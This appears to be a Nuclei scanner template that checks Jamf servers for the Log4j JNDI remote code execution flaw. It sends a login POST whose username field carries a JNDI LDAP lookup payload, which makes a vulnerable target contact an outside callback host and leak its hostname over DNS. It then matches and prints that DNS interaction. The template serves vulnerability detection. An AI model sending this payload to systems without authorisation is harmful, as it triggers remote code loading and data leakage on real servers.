id: jamf-log4j-jndi-rce

info:
  name: JamF  - Log4j Remote Code Execution
  author: pdteam
  severity: critical
  description: |
    JamF is susceptible to Lof4j JNDI remote code execution. JamF is the industry standard when it comes to the management of iOS devices (iPhones and iPads), macOS computers (MacBooks, iMacs, etc.), and tvOS devices (Apple TV).
  reference:
    - https://github.com/random-robbie/jamf-log4j
    - https://community.connection.com/what-is-jamf/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: rce,jndi,log4j,jamf

requests:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Referer: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

# Enhanced by mp on 2022/05/27